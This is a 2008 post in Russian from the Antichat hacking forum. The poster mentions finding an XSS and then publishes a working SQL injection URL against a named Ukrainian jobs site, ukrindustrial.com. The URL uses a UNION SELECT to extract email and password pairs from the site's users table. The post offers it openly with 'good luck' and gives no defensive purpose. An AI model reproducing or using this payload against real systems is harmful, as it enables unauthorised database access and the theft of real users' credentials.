16.03.2008, 12:44
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Нашел сначала пассивную xss, но мне показалось что ресурс содержит еще баги, начал ковырять, в итоге :
Информация о ресурсе смотреть
Код:
http://www.ukrindustrial.com/job/?fuseaction=job_employer.viewVacancy&jvr_id=-11029+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+2,10--
Последний раз редактировалось xcedz; 16.03.2008 в 12:54..
Причина: удачи ;)
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид